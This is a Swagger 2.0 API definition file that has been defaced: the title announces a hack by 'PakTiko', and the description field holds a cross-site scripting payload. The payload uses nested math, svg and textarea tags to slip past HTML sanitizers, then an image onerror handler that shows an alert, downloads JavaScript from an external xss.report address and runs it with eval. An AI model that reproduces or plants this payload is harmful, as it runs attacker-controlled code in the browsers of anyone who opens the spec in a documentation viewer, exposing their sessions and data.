swagger: '2.0'
info:
  title: PakTiko was here. Your system has been hacked!!!!!
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src="https://en.wikipedia.org/wiki/Anonymous_%28hacker_group%29#/media/File:Anonymous_emblem.svg" onerror=alert("Pak Tiko was here!!!");fetch("https://xss.report/c/santiko86").then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
